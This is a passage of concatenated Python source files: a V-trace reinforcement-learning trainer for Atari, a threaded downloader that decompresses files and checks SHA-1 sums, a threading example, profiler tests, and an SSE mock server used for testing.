Nerd alarm: We could just store a
collections.defaultdict(list)
and compute means and standard deviations at the end. But thanks to the
clever math in Sutton-Barto
(http://www.incompleteideas.net/book/first/ebook/node19.html) and
https://math.stackexchange.com/a/103025/5051 we can update both the
means and the stds online. O(1) FTW!
"""
now = timeit.default_timer()
x = now - self.last_time
self.last_time = now
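# Incremental (online) update of the running mean and variance for this event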
n = self._counts[name]
mean = self._means[name] + (x - self._means[name]) / (n + 1)
var = (
n * self._vars[name] + n * (self._means[name] - mean) ** 2 + (x - mean) ** 2
) / (n + 1)
self._means[name] = mean
self._vars[name] = var
self._counts[name] += 1
def means(self):
return self._means
def vars(self):
return self._vars
def stds(self):
return {k: v ** 0.5 for k, v in self._vars.items()}
def summary(self, prefix=""):
means = self.means()
stds = self.stds()
total = sum(means.values())
result = prefix
for k in sorted(means, key=means.get, reverse=True):
result += f"\n %s: %.6fms +- %.6fms (%.2f%%) " % (
k,
1000 * means[k],
1000 * stds[k],
100 * means[k] / total,
)
result += "\nTotal: %.6fms" % (1000 * total)
return result
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
import collections
import torch
import torch.nn.functional as F
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.splitext(os.path.basename(__file__))[0],
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="PongNoFrameskip-v4",
help='the id of the gym environment')
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=45, type=int, metavar="N",
help="Number of actors (default: 45).")
parser.add_argument("--total_steps", default=30000000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=4, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=60, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=4, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.01,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
def _format_frame(frame):
frame = torch.from_numpy(frame)
return frame.view((1, 1) + frame.shape) # (...) -> (T,B,...).
class Environment:
def __init__(self, gym_env):
self.gym_env = gym_env
self.episode_return = None
self.episode_step = None
def initial(self):
initial_reward = torch.zeros(1, 1)
# This supports only single-tensor actions ATM.
initial_last_action = torch.zeros(1, 1, dtype=torch.int64)
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
initial_done = torch.ones(1, 1, dtype=torch.bool)  # bool matches the buffer spec and the (~done) masks used later
initial_frame = _format_frame(self.gym_env.reset())
return dict(
frame=initial_frame,
reward=initial_reward,
done=initial_done,
episode_return=self.episode_return,
episode_step=self.episode_step,
last_action=initial_last_action,
)
def step(self, action):
frame, reward, done, unused_info = self.gym_env.step(action.item())
self.episode_step += 1
self.episode_return += reward
episode_step = self.episode_step
episode_return = self.episode_return
if done:
frame = self.gym_env.reset()
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
frame = _format_frame(frame)
reward = torch.tensor(reward).view(1, 1)
done = torch.tensor(done).view(1, 1)
return dict(
frame=frame,
reward=reward,
done=done,
episode_return=episode_return,
episode_step=episode_step,
last_action=action,
)
def close(self):
self.gym_env.close()
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def create_buffers(args, obs_shape, num_actions) -> Buffers:
T = args.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(args.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def act(
args,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = Timings() # Keep track of how fast things are.
gym_env = create_env(args)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = Environment(gym_env)
def make_env(args):
def thunk():
env = create_env(args)
return env
return thunk
envs = DummyVecEnv([make_env(args) for i in range(1)])
env_output = env.initial()
envs.reset()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(args.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
# timings.time("model")
env_output = env.step(agent_output["action"])
# env_output = env.step(agent_output["action"])
# envs.step((torch.randint(0, envs.action_space.n, (envs.num_envs,))).numpy())
assert agent_output["action"] == env_output["last_action"]
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
VTraceFromLogitsReturns = collections.namedtuple(
"VTraceFromLogitsReturns",
[
"vs",
"pg_advantages",
"log_rhos",
"behavior_action_log_probs",
"target_action_log_probs",
],
)
VTraceReturns = collections.namedtuple("VTraceReturns", "vs pg_advantages")
def action_log_probs(policy_logits, actions):
return -F.nll_loss(
F.log_softmax(torch.flatten(policy_logits, 0, -2), dim=-1),
torch.flatten(actions),
reduction="none",
).view_as(actions)
def from_logits(
behavior_policy_logits,
target_policy_logits,
actions,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace for softmax policies."""
target_action_log_probs = action_log_probs(target_policy_logits, actions)
behavior_action_log_probs = action_log_probs(behavior_policy_logits, actions)
log_rhos = target_action_log_probs - behavior_action_log_probs
vtrace_returns = from_importance_weights(
log_rhos=log_rhos,
discounts=discounts,
rewards=rewards,
values=values,
bootstrap_value=bootstrap_value,
clip_rho_threshold=clip_rho_threshold,
clip_pg_rho_threshold=clip_pg_rho_threshold,
)
return VTraceFromLogitsReturns(
log_rhos=log_rhos,
behavior_action_log_probs=behavior_action_log_probs,
target_action_log_probs=target_action_log_probs,
**vtrace_returns._asdict(),
)
@torch.no_grad()
def from_importance_weights(
log_rhos,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace from log importance weights."""
with torch.no_grad():
rhos = torch.exp(log_rhos)
if clip_rho_threshold is not None:
clipped_rhos = torch.clamp(rhos, max=clip_rho_threshold)
else:
clipped_rhos = rhos
cs = torch.clamp(rhos, max=1.0)
# Append bootstrapped value to get [v1, ..., v_t+1]
values_t_plus_1 = torch.cat(
[values[1:], torch.unsqueeze(bootstrap_value, 0)], dim=0
)
deltas = clipped_rhos * (rewards + discounts * values_t_plus_1 - values)
acc = torch.zeros_like(bootstrap_value)
result = []
for t in range(discounts.shape[0] - 1, -1, -1):
acc = deltas[t] + discounts[t] * cs[t] * acc
result.append(acc)
result.reverse()
vs_minus_v_xs = torch.stack(result)
# Add V(x_s) to get v_s.
vs = torch.add(vs_minus_v_xs, values)
# Advantage for policy gradient.
broadcasted_bootstrap_values = torch.ones_like(vs[0]) * bootstrap_value
vs_t_plus_1 = torch.cat(
[vs[1:], broadcasted_bootstrap_values.unsqueeze(0)], dim=0
)
if clip_pg_rho_threshold is not None:
clipped_pg_rhos = torch.clamp(rhos, max=clip_pg_rho_threshold)
else:
clipped_pg_rhos = rhos
pg_advantages = clipped_pg_rhos * (rewards + discounts * vs_t_plus_1 - values)
# Make sure no gradients backpropagated through the returned values.
return VTraceReturns(vs=vs, pg_advantages=pg_advantages)
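# Hedged shape sketch (not part of the original V-trace code): the helpers above
# expect time-major tensors of shape [T, B] (logits: [T, B, num_actions]) and a
# bootstrap value of shape [B]. The random tensors below only illustrate shapes.
def _vtrace_shape_demo():
    T, B, A = 5, 2, 4
    out = from_logits(
        behavior_policy_logits=torch.randn(T, B, A),
        target_policy_logits=torch.randn(T, B, A),
        actions=torch.randint(A, (T, B)),
        discounts=torch.full((T, B), 0.99),
        rewards=torch.randn(T, B),
        values=torch.randn(T, B),
        bootstrap_value=torch.randn(B),
    )
    assert out.vs.shape == (T, B) and out.pg_advantages.shape == (T, B)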
def get_batch(
args,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(args.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=args.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=args.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
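# Hedged sanity check (not in the original): for uniform logits over A actions the
# policy entropy is log(A), so compute_entropy_loss (the negative entropy, summed
# over all T*B positions) should be approximately -T*B*log(A).
def _entropy_loss_sanity_check():
    T, B, A = 3, 2, 4
    logits = torch.zeros(T, B, A)   # uniform policy
    ent = compute_entropy_loss(logits)
    expected = -T * B * torch.log(torch.tensor(float(A)))
    assert torch.isclose(ent, expected, atol=1e-5)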
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
global step, stats
timings = Timings()
while step < args.total_steps:
timings.reset()
batch, agent_state = get_batch(
args,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
actor_model = model
initial_agent_state = agent_state
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = learner_model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if args.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif args.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * args.discounting
vtrace_returns = from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = args.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = args.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(learner_model.parameters(), args.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(learner_model.state_dict())
timings.time("learn")
with lock:
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Net = AtariNet
def create_env(args):
return wrap_pytorch(
wrap_deepmind(
make_atari(args.gym_id),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
args = parser.parse_args()
if args.num_buffers is None: # Set sensible default for num_buffers.
args.num_buffers = max(2 * args.num_actors, args.batch_size)
if args.num_actors >= args.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if args.num_buffers < args.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = args.unroll_length
B = args.batch_size
args.device = None
if not args.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
args.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
args.device = torch.device("cpu")
env = create_env(args)
model = Net(env.observation_space.shape, env.action_space.n, args.use_lstm)
buffers = create_buffers(args, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(args.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(args.num_actors):
actor = ctx.Process(
target=act,
args=(
args,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, args.use_lstm
).to(device=args.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=args.learning_rate,
momentum=args.momentum,
eps=args.epsilon,
alpha=args.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, args.total_steps) / args.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
for m in range(args.num_buffers):
free_queue.put(m)
threads = []
for i in range(args.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < args.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
pass
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(args.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
|
download.py
|
"""Holds logic for downloading data dump files, with hooks for download progress and completion."""
import bz2
import functools
import gzip
import hashlib
import io
import re
from tempfile import NamedTemporaryFile
import threading
from types import TracebackType
from typing import Optional, Callable
import requests
ProgressHookType = Callable[[int, int], None]
CompletionHookType = Callable[
[Optional[type], Optional[Exception], Optional[TracebackType]], None
]
class _FileWrapper(io.IOBase):
"""Wraps a file for tracking how much of the file has been accessed.
Used for tracking decompression."""
def __init__(self, source: io.IOBase):
super().__init__()
self.source: io.IOBase = source
self.delta = 0
def read(self, n_characters: Optional[int] = None):
"""Mirrors io.IOBase.read for readable files."""
if n_characters:
_content = self.source.read(n_characters)
else:
_content = self.source.read()
self.delta = len(_content)
return _content
class _CompletionManager:
"""Accepts a hook which is passed arguments similar to those passed to a context manager."""
hook: CompletionHookType
def __init__(self, hook: CompletionHookType):
self.hook = hook
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
return self.hook(exc_type, exc_val, exc_tb)
def _decompress(
from_file_wrapper: _FileWrapper,
to_file_path: str,
compression_type: str,
progress_hook: ProgressHookType,
completion_hook: CompletionHookType,
size: int,
):
"""Decompresses file contained in a _FileWrapper."""
assert compression_type in ("bz2", "gz", None)
transfer_chunk_size = 1024 * 10
transfer_wrapper: io.IOBase = {
"bz2": lambda: bz2.BZ2File(from_file_wrapper),
"gz": lambda: gzip.GzipFile(fileobj=from_file_wrapper),
None: lambda: from_file_wrapper,
}[compression_type]()
with transfer_wrapper, open(to_file_path, "wb") as to_file_obj, _CompletionManager(
completion_hook
):
while content := transfer_wrapper.read(transfer_chunk_size):
to_file_obj.write(content)
progress_hook(from_file_wrapper.delta, size)
def _download(
response: requests.Response,
intermediate_buffer: NamedTemporaryFile,
chunk_size: int,
size: int,
progress_hook: ProgressHookType,
completion_hook: CompletionHookType,
sha1: str,
):
"""Download file from response and verify sha1 sum if available."""
hex_d = hashlib.sha1()
with _CompletionManager(completion_hook):
for chunk in response.iter_content(chunk_size=chunk_size):
progress_hook(intermediate_buffer.write(chunk), size)
hex_d.update(chunk)
if sha1:
assert sha1 == hex_d.hexdigest(), "Download verification failed."
def _download_and_decompress(
from_location: str,
to_location: str,
size: int,
session: requests.Session,
sha1: str,
compression_type: str,
download_progress_hook: ProgressHookType,
download_completion_hook: CompletionHookType,
decompress_progress_hook: ProgressHookType,
decompress_completion_hook: CompletionHookType,
chunk_size: int = 1024,
):
"""Downloads file from source, then decompresses it by the protocol provided."""
response = session.get(from_location, stream=True)
response.raise_for_status()
with NamedTemporaryFile() as intermediate_buffer:
_download(
response,
intermediate_buffer,
chunk_size,
size,
download_progress_hook,
download_completion_hook,
sha1,
)
intermediate_buffer.seek(0)
wrapper = _FileWrapper(intermediate_buffer)
return _decompress(
wrapper,
to_location,
compression_type,
decompress_progress_hook,
decompress_completion_hook,
size,
)
def _automatic_resolve_to_location(_from_location: str, _will_decompress: bool) -> str:
"""Holds logic for automatic destination assignment/file suffix cleanup."""
last_term = _from_location.split("/")[-1]
if _will_decompress:
return re.compile(r"(?:\.gz|\.bz2)$").sub("", last_term, count=1)
return last_term
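# Illustrative example (not in the original): with decompression requested,
# "https://host/dumps/enwiki.json.gz" resolves to "enwiki.json"; without it,
# the final path component "enwiki.json.gz" is kept as-is.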
def progress_hook_noop(_delta: int, _total: int):
"""
Does nothing, but takes the arguments that would otherwise be passed to a progress hook.
"""
def completion_hook_noop(
_exc_type: Optional[type],
_exc_val: Optional[Exception],
_exc_tb: Optional[TracebackType],
):
"""
Does nothing, but takes the arguments that would otherwise be passed to a completion hook.
"""
def base_download(
from_location: str,
to_location: Optional[str],
size: int,
session: requests.Session,
sha1: str,
decompress: bool,
download_progress_hook: ProgressHookType,
download_completion_hook: CompletionHookType,
decompress_progress_hook: ProgressHookType,
decompress_completion_hook: CompletionHookType,
chunk_size: int = 1024,
):
"""Contains core logic for path resolution, compression type resolution,
hook resolution, and threading."""
to_location = (
to_location
if to_location is not None
else _automatic_resolve_to_location(from_location, decompress)
)
if not decompress:
compression_type = None
elif from_location.endswith(".gz"):
compression_type = "gz"
elif from_location.endswith(".bz2"):
compression_type = "bz2"
else:
compression_type = None
def progress_noop_if_none(hook) -> ProgressHookType:
return progress_hook_noop if hook is None else hook
def completion_noop_if_none(hook) -> CompletionHookType:
return completion_hook_noop if hook is None else hook
keywords = {
"from_location": from_location,
"to_location": to_location,
"size": size,
"session": session,
"sha1": sha1,
"chunk_size": chunk_size,
"compression_type": compression_type,
"download_progress_hook": progress_noop_if_none(download_progress_hook),
"download_completion_hook": completion_noop_if_none(download_completion_hook),
"decompress_progress_hook": progress_noop_if_none(decompress_progress_hook),
"decompress_completion_hook": completion_noop_if_none(decompress_completion_hook),
}
func = functools.partial(_download_and_decompress, **keywords)
thread = threading.Thread(target=func)
thread.start()
return thread
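# Hedged usage sketch (not part of this module): the URL below is a placeholder
# and a real caller would supply its own size, sha1 and hooks. base_download
# returns the worker thread, so callers that need to block simply join() it.
def _example_download():
    session = requests.Session()
    def on_progress(delta, total):
        print(f"wrote {delta} bytes (reported total: {total})")
    thread = base_download(
        from_location="https://example.org/dump.json.gz",  # placeholder URL
        to_location=None,       # resolved automatically, dropping the .gz suffix
        size=0,                 # unknown; forwarded to the progress hooks as-is
        session=session,
        sha1=None,              # no checksum verification
        decompress=True,
        download_progress_hook=on_progress,
        download_completion_hook=None,
        decompress_progress_hook=None,
        decompress_completion_hook=None,
    )
    thread.join()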
|
example2.py
|
from queue import Queue
from threading import Thread
N = 1_000_000
N_THREADS = 10
q = Queue()
a = list(range(N))
b = list(range(N))
def work(sub_a, sub_b):
sub_c = [x + y for x, y in zip(sub_a, sub_b)]
sub_c = sum(sub_c)
q.put(sub_c)
threads = []
for i in range(N_THREADS):
s = i * (N // N_THREADS)
e = s + (N // N_THREADS)
sub_a = a[s:e]
sub_b = b[s:e]
t = Thread(target=work, args=(sub_a, sub_b))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
sub_cs = []
while not q.empty():
sub_c = q.get()
sub_cs.append(sub_c)
q.task_done()
s = sum(sub_cs)
print(s)
|
test_profile.py
|
import sys
import time
from toolz import first
from threading import Thread
from distributed.profile import (process, merge, create, call_stack,
identifier)
from distributed.compatibility import get_thread_identity
def test_basic():
def test_g():
time.sleep(0.01)
def test_h():
time.sleep(0.02)
def test_f():
for i in range(100):
test_g()
test_h()
thread = Thread(target=test_f)
thread.daemon = True
thread.start()
state = create()
for i in range(100):
time.sleep(0.02)
frame = sys._current_frames()[thread.ident]
process(frame, None, state)
assert state['count'] == 100
d = state
while len(d['children']) == 1:
d = first(d['children'].values())
assert d['count'] == 100
assert 'test_f' in str(d['description'])
g = [c for c in d['children'].values() if 'test_g' in str(c['description'])][0]
h = [c for c in d['children'].values() if 'test_h' in str(c['description'])][0]
assert g['count'] < h['count']
assert g['count'] + h['count'] == 100
def test_merge():
a1 = {
'count': 5,
'identifier': 'root',
'description': 'a',
'children': {
'b': {'count': 3,
'description': 'b-func',
'identifier': 'b',
'children': {}},
'c': {'count': 2,
'description': 'c-func',
'identifier': 'c',
'children': {}}}}
a2 = {
'count': 4,
'description': 'a',
'identifier': 'root',
'children': {
'd': {'count': 2,
'description': 'd-func',
'children': {},
'identifier': 'd'},
'c': {'count': 2,
'description': 'c-func',
'children': {},
'identifier': 'c'}}}
expected = {
'count': 9,
'identifier': 'root',
'description': 'a',
'children': {
'b': {'count': 3,
'description': 'b-func',
'identifier': 'b',
'children': {}},
'd': {'count': 2,
'description': 'd-func',
'identifier': 'd',
'children': {}},
'c': {'count': 4,
'description': 'c-func',
'identifier': 'c',
'children': {}}}}
assert merge(a1, a2) == expected
def test_merge_empty():
assert merge() == create()
assert merge(create()) == create()
assert merge(create(), create()) == create()
def test_call_stack():
frame = sys._current_frames()[get_thread_identity()]
L = call_stack(frame)
assert isinstance(L, list)
assert all(isinstance(s, str) for s in L)
assert 'test_call_stack' in str(L[-1])
def test_identifier():
frame = sys._current_frames()[get_thread_identity()]
assert identifier(frame) == identifier(frame)
assert identifier(None) == identifier(None)
|
mockserver.py
|
"""SSE mock server."""
import json
from collections import namedtuple
import queue
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
Request = namedtuple('Request', ['method', 'path', 'headers', 'body'])
class SSEMockServer(object):
"""SSE server for testing purposes."""
protocol_version = 'HTTP/1.1'
GRACEFUL_REQUEST_END = 'REQ-END'
VIOLENT_REQUEST_END = 'REQ-KILL'
def __init__(self, req_queue=None):
"""Construct a mock server."""
self._queue = queue.Queue()
self._server = HTTPServer(('localhost', 0),
lambda *xs: SSEHandler(self._queue, *xs, req_queue=req_queue))
self._server_thread = threading.Thread(target=self._blocking_run)
self._server_thread.setDaemon(True)
self._done_event = threading.Event()
def _blocking_run(self):
"""Execute."""
self._server.serve_forever()
self._done_event.set()
def port(self):
"""Return the assigned port."""
return self._server.server_port
def publish(self, event):
"""Publish an event."""
self._queue.put(event, block=False)
def start(self):
"""Start the server asynchronously."""
self._server_thread.start()
def wait(self, timeout=None):
"""Wait for the server to shutdown."""
return self._done_event.wait(timeout)
def stop(self):
"""Stop the server."""
self._server.shutdown()
class SSEHandler(BaseHTTPRequestHandler):
"""Handler."""
def __init__(self, event_queue, *args, **kwargs):
"""Construct a handler."""
self._queue = event_queue
self._req_queue = kwargs.get('req_queue')
BaseHTTPRequestHandler.__init__(self, *args)
def do_GET(self): #pylint:disable=invalid-name
"""Respond to a GET request."""
self.send_response(200)
self.send_header("Content-type", "text/event-stream")
self.send_header("Transfer-Encoding", "chunked")
self.send_header("Connection", "keep-alive")
self.end_headers()
if self._req_queue is not None:
headers = dict(zip(self.headers.keys(), self.headers.values()))
self._req_queue.put(Request('GET', self.path, headers, None))
def write_chunk(chunk):
"""Write an event/chunk."""
tosend = '%X\r\n%s\r\n'%(len(chunk), chunk)
self.wfile.write(tosend.encode('utf-8'))
while True:
event = self._queue.get()
if event == SSEMockServer.GRACEFUL_REQUEST_END:
break
elif event == SSEMockServer.VIOLENT_REQUEST_END:
raise Exception('exploding')
chunk = ''
chunk += 'id: % s\n' % event['id'] if 'id' in event else ''
